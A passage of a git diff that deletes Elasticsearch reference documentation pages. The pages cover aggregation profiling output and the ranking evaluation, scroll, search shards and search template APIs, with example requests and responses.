`[bakery]`, so the query rewrites to a single TermQuery for -"bakery". - -Due to this dynamic, per-segment rewriting, the clean tree structure becomes -distorted and no longer follows a clean "lineage" showing how one query rewrites -into the next. At present time, all we can do is apologize, and suggest you -collapse the details for that query's children if it is too confusing. Luckily, -all the timing statistics are correct, just not the physical layout in the -response, so it is sufficient to just analyze the top-level MultiTermQuery and -ignore its children if you find the details too tricky to interpret. - -Hopefully this will be fixed in future iterations, but it is a tricky problem to -solve and still in-progress. :) - -[[profiling-aggregations]] -===== Profiling Aggregations - - -[[agg-section]] -====== `aggregations` Section - - -The `aggregations` section contains detailed timing of the aggregation tree -executed by a particular shard. The overall structure of this aggregation tree -will resemble your original {es} request. Let's execute the previous query again -and look at the aggregation profile this time: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search -{ - "profile": true, - "query": { - "term": { - "user.id": { - "value": "elkbee" - } - } - }, - "aggs": { - "my_scoped_agg": { - "terms": { - "field": "http.response.status_code" - } - }, - "my_global_agg": { - "global": {}, - "aggs": { - "my_level_agg": { - "terms": { - "field": "http.response.status_code" - } - } - } - } - }, - "post_filter": { - "match": { - "message": "search" - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=profile.shards.aggregations/] -// TEST[continued] - - -This yields the following aggregation profile output: - -[source,console-result] --------------------------------------------------- -{ - "profile": { - "shards": [ - { - "aggregations": [ - { - "type": "NumericTermsAggregator", - "description": "my_scoped_agg", - "time_in_nanos": 79294, - "breakdown": { - "reduce": 0, - "build_aggregation": 30885, - "build_aggregation_count": 1, - "initialize": 2623, - "initialize_count": 1, - "reduce_count": 0, - "collect": 45786, - "collect_count": 4, - "build_leaf_collector": 18211, - "build_leaf_collector_count": 1, - "post_collection": 929, - "post_collection_count": 1 - }, - "debug": { - "total_buckets": 1, - "result_strategy": "long_terms" - } - }, - { - "type": "GlobalAggregator", - "description": "my_global_agg", - "time_in_nanos": 104325, - "breakdown": { - "reduce": 0, - "build_aggregation": 22470, - "build_aggregation_count": 1, - "initialize": 12454, - "initialize_count": 1, - "reduce_count": 0, - "collect": 69401, - "collect_count": 4, - "build_leaf_collector": 8150, - "build_leaf_collector_count": 1, - "post_collection": 1584, - "post_collection_count": 1 - }, - "children": [ - { - "type": "NumericTermsAggregator", - "description": "my_level_agg", - "time_in_nanos": 76876, - "breakdown": { - "reduce": 0, - "build_aggregation": 13824, - "build_aggregation_count": 1, - "initialize": 1441, - "initialize_count": 1, - "reduce_count": 0, - "collect": 61611, - "collect_count": 4, - "build_leaf_collector": 5564, - "build_leaf_collector_count": 1, - "post_collection": 471, - "post_collection_count": 1 - }, - "debug": { - "total_buckets": 1, - "result_strategy": "long_terms" - } - } - ] - } - ] - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] -// TESTRESPONSE[s/(?<=[" ])\d+(\.\d+)?/$body.$_path/] -// TESTRESPONSE[s/"id": "\[P6-vulHtQRWuD4YnubWb7A\]\[my-index-000001\]\[0\]"/"id": $body.profile.shards.0.id/] - -From the profile structure we can see that the `my_scoped_agg` is internally -being run as a `NumericTermsAggregator` (because the field it is aggregating, -`http.response.status_code`, is a numeric field). At the same level, we see a `GlobalAggregator` -which comes from `my_global_agg`. That aggregation then has a child -`NumericTermsAggregator` which comes from the second term's aggregation on `http.response.status_code`. - -The `time_in_nanos` field shows the time executed by each aggregation, and is -inclusive of all children. While the overall time is useful, the `breakdown` -field will give detailed stats about how the time was spent. - -Some aggregations may return expert `debug` information that describe features -of the underlying execution of the aggregation that are 'useful for folks that -hack on aggregations but that we don't expect to be otherwise useful. They can -vary wildly between versions, aggregations, and aggregation execution -strategies. - -===== Timing Breakdown - -The `breakdown` component lists detailed statistics about low-level execution: - -[source,js] --------------------------------------------------- -"breakdown": { - "reduce": 0, - "build_aggregation": 30885, - "build_aggregation_count": 1, - "initialize": 2623, - "initialize_count": 1, - "reduce_count": 0, - "collect": 45786, - "collect_count": 4, - "build_leaf_collector": 18211, - "build_leaf_collector_count": 1, - "post_collection": 929, - "post_collection_count": 1 -} --------------------------------------------------- -// NOTCONSOLE - -Each property in the `breakdown` component corresponds to an internal method for -the aggregation. For example, the `build_leaf_collector` property measures -nanoseconds spent running the aggregation's `getLeafCollector()` method. -Properties ending in `_count` record the number of invocations of the particular -method. For example, `"collect_count": 2` means the aggregation called the -`collect()` on two different documents. The `reduce` property is reserved for -future use and always returns `0`. - -Timings are listed in wall-clock nanoseconds and are not normalized at all. All -caveats about the overall `time` apply here. The intention of the breakdown is -to give you a feel for A) what machinery in {es} is actually eating time, and B) -the magnitude of differences in times between the various components. Like the -overall time, the breakdown is inclusive of all children times. - -[[profiling-considerations]] -===== Profiling Considerations - -Like any profiler, the Profile API introduces a non-negligible overhead to -search execution. The act of instrumenting low-level method calls such as -`collect`, `advance`, and `next_doc` can be fairly expensive, since these -methods are called in tight loops. Therefore, profiling should not be enabled -in production settings by default, and should not be compared against -non-profiled query times. Profiling is just a diagnostic tool. - -There are also cases where special Lucene optimizations are disabled, since they -are not amenable to profiling. This could cause some queries to report larger -relative times than their non-profiled counterparts, but in general should not -have a drastic effect compared to other components in the profiled query. - -[[profile-limitations]] -===== Limitations - -- Profiling currently does not measure the search fetch phase nor the network -overhead. -- Profiling also does not account for time spent in the queue, merging shard -responses on the coordinating node, or additional work such as building global -ordinals (an internal data structure used to speed up search). -- Profiling statistics are currently not available for suggestions, -highlighting, `dfs_query_then_fetch`. -- Profiling of the reduce phase of aggregation is currently not available. -- The Profiler is still highly experimental. The Profiler is instrumenting parts -of Lucene that were never designed to be exposed in this manner, and so all -results should be viewed as a best effort to provide detailed diagnostics. We -hope to improve this over time. If you find obviously wrong numbers, strange -query structures, or other bugs, please report them! diff --git a/docs/reference/search/rank-eval.asciidoc b/docs/reference/search/rank-eval.asciidoc deleted file mode 100644 index 7d750a34e5d..00000000000 --- a/docs/reference/search/rank-eval.asciidoc +++ /dev/null @@ -1,535 +0,0 @@ -[[search-rank-eval]] -=== Ranking evaluation API -++++ -Ranking evaluation -++++ - -Allows you to evaluate the quality of ranked search results over a set of -typical search queries. - -[[search-rank-eval-api-request]] -==== {api-request-title} - -`GET //_rank_eval` - -`POST //_rank_eval` - - -[[search-rank-eval-api-desc]] -==== {api-description-title} - -The ranking evaluation API allows you to evaluate the quality of ranked search -results over a set of typical search queries. Given this set of queries and a -list of manually rated documents, the `_rank_eval` endpoint calculates and -returns typical information retrieval metrics like _mean reciprocal rank_, -_precision_ or _discounted cumulative gain_. - -Search quality evaluation starts with looking at the users of your search -application, and the things that they are searching for. Users have a specific -_information need_; for example, they are looking for gift in a web shop or want -to book a flight for their next holiday. They usually enter some search terms -into a search box or some other web form. All of this information, together with -meta information about the user (for example the browser, location, earlier -preferences and so on) then gets translated into a query to the underlying -search system. - -The challenge for search engineers is to tweak this translation process from -user entries to a concrete query, in such a way that the search results contain -the most relevant information with respect to the user's information need. This -can only be done if the search result quality is evaluated constantly across a -representative test suite of typical user queries, so that improvements in the -rankings for one particular query don't negatively affect the ranking for -other types of queries. - -In order to get started with search quality evaluation, you need three basic -things: - -. A collection of documents you want to evaluate your query performance against, - usually one or more data streams or indices. -. A collection of typical search requests that users enter into your system. -. A set of document ratings that represent the documents' relevance with respect - to a search request. - -It is important to note that one set of document ratings is needed per test -query, and that the relevance judgements are based on the information need of -the user that entered the query. - -The ranking evaluation API provides a convenient way to use this information in -a ranking evaluation request to calculate different search evaluation metrics. -This gives you a first estimation of your overall search quality, as well as a -measurement to optimize against when fine-tuning various aspect of the query -generation in your application. - - -[[search-rank-eval-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) -Comma-separated list of data streams, indices, and index aliases used to limit -the request. Wildcard (`*`) expressions are supported. -+ -To target all data streams and indices in a cluster, omit this parameter or use -`_all` or `*`. - -[[search-rank-eval-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ --- -Defaults to `open`. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - - -[[search-rank-eval-api-example]] -==== {api-examples-title} - -In its most basic form, a request to the `_rank_eval` endpoint has two sections: - -[source,js] ------------------------------ -GET /my-index-000001/_rank_eval -{ - "requests": [ ... ], <1> - "metric": { <2> - "mean_reciprocal_rank": { ... } <3> - } -} ------------------------------ -// NOTCONSOLE - -<1> a set of typical search requests, together with their provided ratings -<2> definition of the evaluation metric to calculate -<3> a specific metric and its parameters - -The request section contains several search requests typical to your -application, along with the document ratings for each particular search request. - -[source,js] ------------------------------ -GET /my-index-000001/_rank_eval -{ - "requests": [ - { - "id": "amsterdam_query", <1> - "request": { <2> - "query": { "match": { "text": "amsterdam" } } - }, - "ratings": [ <3> - { "_index": "my-index-000001", "_id": "doc1", "rating": 0 }, - { "_index": "my-index-000001", "_id": "doc2", "rating": 3 }, - { "_index": "my-index-000001", "_id": "doc3", "rating": 1 } - ] - }, - { - "id": "berlin_query", - "request": { - "query": { "match": { "text": "berlin" } } - }, - "ratings": [ - { "_index": "my-index-000001", "_id": "doc1", "rating": 1 } - ] - } - ] -} ------------------------------ -// NOTCONSOLE - -<1> The search request's ID, used to group result details later. -<2> The query being evaluated. -<3> A list of document ratings. Each entry contains the following arguments: -- `_index`: The document's index. For data streams, this should be the - document's backing index. -- `_id`: The document ID. -- `rating`: The document's relevance with regard to this search request. - -A document `rating` can be any integer value that expresses the relevance of the -document on a user-defined scale. For some of the metrics, just giving a binary -rating (for example `0` for irrelevant and `1` for relevant) will be sufficient, -while other metrics can use a more fine-grained scale. - - -===== Template-based ranking evaluation - -As an alternative to having to provide a single query per test request, it is -possible to specify query templates in the evaluation request and later refer to -them. This way, queries with a similar structure that differ only in their -parameters don't have to be repeated all the time in the `requests` section. -In typical search systems, where user inputs usually get filled into a small -set of query templates, this helps make the evaluation request more succinct. - -[source,js] --------------------------------- -GET /my-index-000001/_rank_eval -{ - [...] - "templates": [ - { - "id": "match_one_field_query", <1> - "template": { <2> - "inline": { - "query": { - "match": { "{{field}}": { "query": "{{query_string}}" }} - } - } - } - } - ], - "requests": [ - { - "id": "amsterdam_query" - "ratings": [ ... ], - "template_id": "match_one_field_query", <3> - "params": { <4> - "query_string": "amsterdam", - "field": "text" - } - }, - [...] -} --------------------------------- -// NOTCONSOLE - -<1> the template id -<2> the template definition to use -<3> a reference to a previously defined template -<4> the parameters to use to fill the template - -It is also possible to use <> in the cluster state by referencing their id in the templates section. - -[source,js] --------------------------------- -GET /my_index/_rank_eval -{ - [...] - "templates": [ - { - "id": "match_one_field_query", <1> - "template": { <2> - "id": "match_one_field_query" - } - } - ], - "requests": [...] -} --------------------------------- -// NOTCONSOLE - -<1> the template id used for requests -<2> the template id stored in the cluster state - -===== Available evaluation metrics - -The `metric` section determines which of the available evaluation metrics -will be used. The following metrics are supported: - -[discrete] -[[k-precision]] -===== Precision at K (P@k) - -This metric measures the proportion of relevant results in the top k search results. -It's a form of the well-known -{wikipedia}/Evaluation_measures_(information_retrieval)#Precision[Precision] -metric that only looks at the top k documents. It is the fraction of relevant -documents in those first k results. A precision at 10 (P@10) value of 0.6 then -means 6 out of the 10 top hits are relevant with respect to the user's -information need. - -P@k works well as a simple evaluation metric that has the benefit of being easy -to understand and explain. Documents in the collection need to be rated as either -relevant or irrelevant with respect to the current query. P@k is a set-based -metric and does not take into account the position of the relevant documents -within the top k results, so a ranking of ten results that contains one -relevant result in position 10 is equally as good as a ranking of ten results -that contains one relevant result in position 1. - -[source,console] --------------------------------- -GET /my-index-000001/_rank_eval -{ - "requests": [ - { - "id": "JFK query", - "request": { "query": { "match_all": {} } }, - "ratings": [] - } ], - "metric": { - "precision": { - "k": 20, - "relevant_rating_threshold": 1, - "ignore_unlabeled": false - } - } -} --------------------------------- -// TEST[setup:my_index] - -The `precision` metric takes the following optional parameters - -[cols="<,<",options="header",] -|======================================================================= -|Parameter |Description -|`k` |sets the maximum number of documents retrieved per query. This value will act in place of the usual `size` parameter -in the query. Defaults to 10. -|`relevant_rating_threshold` |sets the rating threshold above which documents are considered to be -"relevant". Defaults to `1`. -|`ignore_unlabeled` |controls how unlabeled documents in the search results are counted. -If set to 'true', unlabeled documents are ignored and neither count as relevant or irrelevant. Set to 'false' (the default), they are treated as irrelevant. -|======================================================================= - - -[discrete] -[[k-recall]] -===== Recall at K (R@k) - -This metric measures the total number of relevant results in the top k search -results. It's a form of the well-known -{wikipedia}/Evaluation_measures_(information_retrieval)#Recall[Recall] -metric. It is the fraction of relevant documents in those first k results -relative to all possible relevant results. A recall at 10 (R@10) value of 0.5 then -means 4 out of 8 relevant documents, with respect to the user's information -need, were retrieved in the 10 top hits. - -R@k works well as a simple evaluation metric that has the benefit of being easy -to understand and explain. Documents in the collection need to be rated as either -relevant or irrelevant with respect to the current query. R@k is a set-based -metric and does not take into account the position of the relevant documents -within the top k results, so a ranking of ten results that contains one -relevant result in position 10 is equally as good as a ranking of ten results -that contains one relevant result in position 1. - -[source,console] --------------------------------- -GET /my-index-000001/_rank_eval -{ - "requests": [ - { - "id": "JFK query", - "request": { "query": { "match_all": {} } }, - "ratings": [] - } ], - "metric": { - "recall": { - "k": 20, - "relevant_rating_threshold": 1 - } - } -} --------------------------------- -// TEST[setup:my_index] - -The `recall` metric takes the following optional parameters - -[cols="<,<",options="header",] -|======================================================================= -|Parameter |Description -|`k` |sets the maximum number of documents retrieved per query. This value will act in place of the usual `size` parameter -in the query. Defaults to 10. -|`relevant_rating_threshold` |sets the rating threshold above which documents are considered to be -"relevant". Defaults to `1`. -|======================================================================= - - -[discrete] -===== Mean reciprocal rank - -For every query in the test suite, this metric calculates the reciprocal of the -rank of the first relevant document. For example, finding the first relevant -result in position 3 means the reciprocal rank is 1/3. The reciprocal rank for -each query is averaged across all queries in the test suite to give the -{wikipedia}/Mean_reciprocal_rank[mean reciprocal rank]. - -[source,console] --------------------------------- -GET /my-index-000001/_rank_eval -{ - "requests": [ - { - "id": "JFK query", - "request": { "query": { "match_all": {} } }, - "ratings": [] - } ], - "metric": { - "mean_reciprocal_rank": { - "k": 20, - "relevant_rating_threshold": 1 - } - } -} --------------------------------- -// TEST[setup:my_index] - -The `mean_reciprocal_rank` metric takes the following optional parameters - -[cols="<,<",options="header",] -|======================================================================= -|Parameter |Description -|`k` |sets the maximum number of documents retrieved per query. This value will act in place of the usual `size` parameter -in the query. Defaults to 10. -|`relevant_rating_threshold` |Sets the rating threshold above which documents are considered to be -"relevant". Defaults to `1`. -|======================================================================= - - -[discrete] -===== Discounted cumulative gain (DCG) - -In contrast to the two metrics above, -{wikipedia}/Discounted_cumulative_gain[discounted cumulative gain] -takes both the rank and the rating of the search results into account. - -The assumption is that highly relevant documents are more useful for the user -when appearing at the top of the result list. Therefore, the DCG formula reduces -the contribution that high ratings for documents on lower search ranks have on -the overall DCG metric. - -[source,console] --------------------------------- -GET /my-index-000001/_rank_eval -{ - "requests": [ - { - "id": "JFK query", - "request": { "query": { "match_all": {} } }, - "ratings": [] - } ], - "metric": { - "dcg": { - "k": 20, - "normalize": false - } - } -} --------------------------------- -// TEST[setup:my_index] - -The `dcg` metric takes the following optional parameters: - -[cols="<,<",options="header",] -|======================================================================= -|Parameter |Description -|`k` |sets the maximum number of documents retrieved per query. This value will act in place of the usual `size` parameter -in the query. Defaults to 10. -|`normalize` | If set to `true`, this metric will calculate the {wikipedia}/Discounted_cumulative_gain#Normalized_DCG[Normalized DCG]. -|======================================================================= - - -[discrete] -===== Expected Reciprocal Rank (ERR) - -Expected Reciprocal Rank (ERR) is an extension of the classical reciprocal rank -for the graded relevance case (Olivier Chapelle, Donald Metzler, Ya Zhang, and -Pierre Grinspan. 2009. -https://olivier.chapelle.cc/pub/err.pdf[Expected reciprocal rank for graded relevance].) - -It is based on the assumption of a cascade model of search, in which a user -scans through ranked search results in order and stops at the first document -that satisfies the information need. For this reason, it is a good metric for -question answering and navigation queries, but less so for survey-oriented -information needs where the user is interested in finding many relevant -documents in the top k results. - -The metric models the expectation of the reciprocal of the position at which a -user stops reading through the result list. This means that a relevant document -in a top ranking position will have a large contribution to the overall score. -However, the same document will contribute much less to the score if it appears -in a lower rank; even more so if there are some relevant (but maybe less relevant) -documents preceding it. In this way, the ERR metric discounts documents that -are shown after very relevant documents. This introduces a notion of dependency -in the ordering of relevant documents that e.g. Precision or DCG don't account -for. - -[source,console] --------------------------------- -GET /my-index-000001/_rank_eval -{ - "requests": [ - { - "id": "JFK query", - "request": { "query": { "match_all": {} } }, - "ratings": [] - } ], - "metric": { - "expected_reciprocal_rank": { - "maximum_relevance": 3, - "k": 20 - } - } -} --------------------------------- -// TEST[setup:my_index] - -The `expected_reciprocal_rank` metric takes the following parameters: - -[cols="<,<",options="header",] -|======================================================================= -|Parameter |Description -| `maximum_relevance` | Mandatory parameter. The highest relevance grade used in the user-supplied -relevance judgments. -|`k` | sets the maximum number of documents retrieved per query. This value will act in place of the usual `size` parameter -in the query. Defaults to 10. -|======================================================================= - - -===== Response format - -The response of the `_rank_eval` endpoint contains the overall calculated result -for the defined quality metric, a `details` section with a breakdown of results -for each query in the test suite and an optional `failures` section that shows -potential errors of individual queries. The response has the following format: - -[source,js] --------------------------------- -{ - "rank_eval": { - "metric_score": 0.4, <1> - "details": { - "my_query_id1": { <2> - "metric_score": 0.6, <3> - "unrated_docs": [ <4> - { - "_index": "my-index-000001", - "_id": "1960795" - }, ... - ], - "hits": [ - { - "hit": { <5> - "_index": "my-index-000001", - "_type": "page", - "_id": "1528558", - "_score": 7.0556192 - }, - "rating": 1 - }, ... - ], - "metric_details": { <6> - "precision": { - "relevant_docs_retrieved": 6, - "docs_retrieved": 10 - } - } - }, - "my_query_id2": { [... ] } - }, - "failures": { [... ] } - } -} --------------------------------- -// NOTCONSOLE - -<1> the overall evaluation quality calculated by the defined metric -<2> the `details` section contains one entry for every query in the original `requests` section, keyed by the search request id -<3> the `metric_score` in the `details` section shows the contribution of this query to the global quality metric score -<4> the `unrated_docs` section contains an `_index` and `_id` entry for each document in the search result for this -query that didn't have a ratings value. This can be used to ask the user to supply ratings for these documents -<5> the `hits` section shows a grouping of the search results with their supplied ratings -<6> the `metric_details` give additional information about the calculated quality metric (e.g. how many of the retrieved -documents were relevant). The content varies for each metric but allows for better interpretation of the results diff --git a/docs/reference/search/scroll-api.asciidoc b/docs/reference/search/scroll-api.asciidoc deleted file mode 100644 index 98627abf905..00000000000 --- a/docs/reference/search/scroll-api.asciidoc +++ /dev/null @@ -1,146 +0,0 @@ -[[scroll-api]] -=== Scroll API -++++ -Scroll -++++ - -IMPORTANT: We no longer recommend using the scroll API for deep pagination. If -you need to preserve the index state while paging through more than 10,000 hits, -use the <> parameter with a point in time (PIT). - -Retrieves the next batch of results for a <>. - -//// -[source,console] --------------------------------------------------- -GET /_search?scroll=1m -{ - "size": 1, - "query": { - "match_all": {} - } -} --------------------------------------------------- -// TEST[setup:my_index] -//// - -[source,console] --------------------------------------------------- -GET /_search/scroll -{ - "scroll_id" : "DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAAAD4WYm9laVYtZndUQlNsdDcwakFMNjU1QQ==" -} --------------------------------------------------- -// TEST[continued] -// TEST[s/DXF1ZXJ5QW5kRmV0Y2gBAAAAAAAAAD4WYm9laVYtZndUQlNsdDcwakFMNjU1QQ==/$body._scroll_id/] - -[[scroll-api-request]] -==== {api-request-title} - -`GET /_search/scroll/` -deprecated:[7.0.0] - -`GET /_search/scroll` - -`POST /_search/scroll/` -deprecated:[7.0.0] - -`POST /_search/scroll` - -[[scroll-api-desc]] -==== {api-description-title} - -You can use the scroll API to retrieve large sets of results from a single -<> request. - -The scroll API requires a scroll ID. To get a scroll ID, submit a -<> request that includes an argument for the -<>. The `scroll` -parameter indicates how long {es} should retain the -<> for the request. - -The search response returns a scroll ID in the `_scroll_id` response body -parameter. You can then use the scroll ID with the scroll API to retrieve the -next batch of results for the request. - -You can also use the scroll API to specify a new `scroll` parameter that extends -or shortens the retention period for the search context. - -See <>. - -IMPORTANT: Results from a scrolling search reflect the state of the index at the -time of the initial search request. Subsequent indexing or document changes only -affect later search and scroll requests. - -[[scroll-api-path-params]] -==== {api-path-parms-title} - -``:: -deprecated:[7.0.0] -(Optional, string) -Scroll ID of the search. -+ -IMPORTANT: Scroll IDs can be long. We recommend only specifying scroll IDs using -the <>. - -[[scroll-api-query-params]] -==== {api-query-parms-title} - -`scroll`:: -(Optional, <>) -Period to retain the <> for scrolling. See -<>. -+ -This value overrides the duration set by the original search API request's -`scroll` parameter. -+ -By default, this value cannot exceed `1d` (24 hours). You can change -this limit using the `search.max_keep_alive` cluster-level setting. -+ -IMPORTANT: You can also specify this value using the `scroll` request body -parameter. If both parameters are specified, only the query parameter is used. - -`scroll_id`:: -deprecated:[7.0.0] -(Optional, string) -Scroll ID for the search. -+ -IMPORTANT: Scroll IDs can be long. We recommend only specifying scroll IDs using -the <>. - -`rest_total_hits_as_int`:: -(Optional, Boolean) -If `true`, the API response's `hit.total` property is returned as an integer. -If `false`, the API response's `hit.total` property is returned as an object. -Defaults to `false`. - -[role="child_attributes"] -[[scroll-api-request-body]] -==== {api-request-body-title} - -`scroll`:: -(Optional, <>) -Period to retain the <> for scrolling. See -<>. -+ -This value overrides the duration set by the original search API request's -`scroll` parameter. -+ -By default, this value cannot exceed `1d` (24 hours). You can change -this limit using the `search.max_keep_alive` cluster-level setting. -+ -IMPORTANT: You can also specify this value using the `scroll` query -parameter. If both parameters are specified, only the query parameter is used. - -[[scroll-api-scroll-id-param]] -`scroll_id`:: -(Required, string) -Scroll ID for the search. - -[role="child_attributes"] -[[scroll-api-response-body]] -==== {api-response-body-title} - -The scroll API returns the same response body as the search API. See the search -API's <>. diff --git a/docs/reference/search/search-shards.asciidoc b/docs/reference/search/search-shards.asciidoc deleted file mode 100644 index f44e129c0de..00000000000 --- a/docs/reference/search/search-shards.asciidoc +++ /dev/null @@ -1,190 +0,0 @@ -[[search-shards]] -=== Search Shards API - -Returns the indices and shards that a search request would be executed against. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search_shards --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n{"settings":{"index.number_of_shards":5}}\n/] - - -[[search-shards-api-request]] -==== {api-request-title} - -`GET //_search_shards` - - -[[search-shards-api-desc]] -==== {api-description-title} - -The search shards api returns the indices and shards that a search request would -be executed against. This can give useful feedback for working out issues or -planning optimizations with routing and shard preferences. When filtered aliases -are used, the filter is returned as part of the `indices` section. - - -[[search-shards-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] - - -[[search-shards-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ --- -Defaults to `open`. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=local] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - - -[[search-shards-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search_shards --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n{"settings":{"index.number_of_shards":5}}\n/] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "nodes": ..., - "indices" : { - "my-index-000001": { } - }, - "shards": [ - [ - { - "index": "my-index-000001", - "node": "JklnKbD7Tyqi9TP3_Q_tBg", - "primary": true, - "shard": 0, - "state": "STARTED", - "allocation_id": {"id":"0TvkCyF7TAmM1wHP4a42-A"}, - "relocating_node": null - } - ], - [ - { - "index": "my-index-000001", - "node": "JklnKbD7Tyqi9TP3_Q_tBg", - "primary": true, - "shard": 1, - "state": "STARTED", - "allocation_id": {"id":"fMju3hd1QHWmWrIgFnI4Ww"}, - "relocating_node": null - } - ], - [ - { - "index": "my-index-000001", - "node": "JklnKbD7Tyqi9TP3_Q_tBg", - "primary": true, - "shard": 2, - "state": "STARTED", - "allocation_id": {"id":"Nwl0wbMBTHCWjEEbGYGapg"}, - "relocating_node": null - } - ], - [ - { - "index": "my-index-000001", - "node": "JklnKbD7Tyqi9TP3_Q_tBg", - "primary": true, - "shard": 3, - "state": "STARTED", - "allocation_id": {"id":"bU_KLGJISbW0RejwnwDPKw"}, - "relocating_node": null - } - ], - [ - { - "index": "my-index-000001", - "node": "JklnKbD7Tyqi9TP3_Q_tBg", - "primary": true, - "shard": 4, - "state": "STARTED", - "allocation_id": {"id":"DMs7_giNSwmdqVukF7UydA"}, - "relocating_node": null - } - ] - ] -} --------------------------------------------------- -// TESTRESPONSE[s/"nodes": ...,/"nodes": $body.nodes,/] -// TESTRESPONSE[s/JklnKbD7Tyqi9TP3_Q_tBg/$body.shards.0.0.node/] -// TESTRESPONSE[s/0TvkCyF7TAmM1wHP4a42-A/$body.shards.0.0.allocation_id.id/] -// TESTRESPONSE[s/fMju3hd1QHWmWrIgFnI4Ww/$body.shards.1.0.allocation_id.id/] -// TESTRESPONSE[s/Nwl0wbMBTHCWjEEbGYGapg/$body.shards.2.0.allocation_id.id/] -// TESTRESPONSE[s/bU_KLGJISbW0RejwnwDPKw/$body.shards.3.0.allocation_id.id/] -// TESTRESPONSE[s/DMs7_giNSwmdqVukF7UydA/$body.shards.4.0.allocation_id.id/] - -Specifying the same request, this time with a routing value: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search_shards?routing=foo,bar --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n{"settings":{"index.number_of_shards":5}}\n/] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "nodes": ..., - "indices" : { - "my-index-000001": { } - }, - "shards": [ - [ - { - "index": "my-index-000001", - "node": "JklnKbD7Tyqi9TP3_Q_tBg", - "primary": true, - "shard": 2, - "state": "STARTED", - "allocation_id": {"id":"fMju3hd1QHWmWrIgFnI4Ww"}, - "relocating_node": null - } - ], - [ - { - "index": "my-index-000001", - "node": "JklnKbD7Tyqi9TP3_Q_tBg", - "primary": true, - "shard": 3, - "state": "STARTED", - "allocation_id": {"id":"0TvkCyF7TAmM1wHP4a42-A"}, - "relocating_node": null - } - ] - ] -} --------------------------------------------------- -// TESTRESPONSE[s/"nodes": ...,/"nodes": $body.nodes,/] -// TESTRESPONSE[s/JklnKbD7Tyqi9TP3_Q_tBg/$body.shards.1.0.node/] -// TESTRESPONSE[s/0TvkCyF7TAmM1wHP4a42-A/$body.shards.1.0.allocation_id.id/] -// TESTRESPONSE[s/fMju3hd1QHWmWrIgFnI4Ww/$body.shards.0.0.allocation_id.id/] - -Because of the specified routing values, -the search is only executed against two of the shards. diff --git a/docs/reference/search/search-template.asciidoc b/docs/reference/search/search-template.asciidoc deleted file mode 100644 index cf0c78bf549..00000000000 --- a/docs/reference/search/search-template.asciidoc +++ /dev/null @@ -1,706 +0,0 @@ -[[search-template]] -=== Search Template - -Allows you to use the mustache language to pre render search requests. - -[source,console] ------------------------------------------- -GET _search/template -{ - "source" : { - "query": { "match" : { "{{my_field}}" : "{{my_value}}" } }, - "size" : "{{my_size}}" - }, - "params" : { - "my_field" : "message", - "my_value" : "foo", - "my_size" : 5 - } -} ------------------------------------------- -// TEST[setup:my_index] - -[[search-template-api-request]] -==== {api-request-title} - -`GET _search/template` - - -[[search-template-api-desc]] -==== {api-description-title} - -The `/_search/template` endpoint allows you to use the mustache language to pre- -render search requests, before they are executed and fill existing templates -with template parameters. - -For more information on how Mustache templating and what kind of templating you -can do with it check out the https://mustache.github.io/mustache.5.html[online -documentation of the mustache project]. - -NOTE: The mustache language is implemented in {es} as a sandboxed scripting -language, hence it obeys settings that may be used to enable or disable scripts -per type and context as described in the -<>. - - -[[search-template-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] - - -[[search-template-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -`ccs_minimize_roundtrips`:: - (Optional, Boolean) If `true`, network round-trips are minimized for - cross-cluster search requests. Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] - -`explain`:: - (Optional, Boolean) If `true`, the response includes additional details about - score computation as part of a hit. Defaults to `false`. - -`ignore_throttled`:: - (Optional, Boolean) If `true`, specified concrete, expanded or aliased indices - are not included in the response when throttled. Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -`profile`:: - (Optional, Boolean) If `true`, the query execution is profiled. Defaults - to `false`. - -`rest_total_hits_as_int`:: - (Optional, Boolean) If `true`, `hits.total` are rendered as an integer in - the response. Defaults to `false`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=scroll] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=search_type] - -`typed_keys`:: - (Optional, Boolean) If `true`, aggregation and suggester names are - prefixed by their respective types in the response. Defaults to `false`. - - -[[search-template-api-request-body]] -==== {api-request-body-title} - -The API request body must contain the search definition template and its parameters. - - -[[search-template-api-example]] -==== {api-response-codes-title} - - -[[pre-registered-templates]] -===== Store a search template - -You can store a search template using the stored scripts API. - -[source,console] ------------------------------------------- -POST 